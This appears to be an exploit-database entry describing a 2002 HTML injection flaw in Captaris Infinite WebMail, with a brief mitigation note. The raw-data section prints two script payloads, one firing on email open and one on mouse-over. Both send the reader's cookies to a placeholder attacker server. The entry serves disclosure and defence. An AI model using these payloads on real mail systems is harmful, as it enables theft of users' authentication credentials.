header-logo
Suggest Exploit
vendor:
Infinite WebMail
by:
SecurityFocus
8.3
CVSS
HIGH
HTML Injection
79
CWE
Product Name: Infinite WebMail
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

HTML Injection Vulnerability in Captaris Infinite WebMail

An HTML injection vulnerability has been discovered in Captaris Infinite WebMail. Due to insufficient sanitization of HTML content, it is possible for an attacker to embed malicious script code into HTML email messages. This may allow an attacker to steal cookie-based authentication credentials from users of the webmail system. Two examples of malicious code are provided, one which launches on e-mail open and one which launches on mouse over.

Mitigation:

Sanitize HTML content to prevent malicious code from being embedded in HTML email messages.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6411/info

An HTML injection vulnerability has been discovered in Captaris Infinite WebMail. Due to insufficient sanitization of HTML content, it is possible for an attacker to embed malicious script code into HTML email messages.

This may allow an attacker to steal cookie-based authentication credentials from users of the webmail system. Other attacks are also possible.

Launch on e-mail open:
<p style="left:expression(document.location=
'http://attackers.server/cgi-bin/logger.cgi?'
+document.cookie)">

Launch on mouse over:
<b onMouseOver= "document.location=
'http://attackers.server/cgi-bin/logger.cgi?'
+document.cookie\">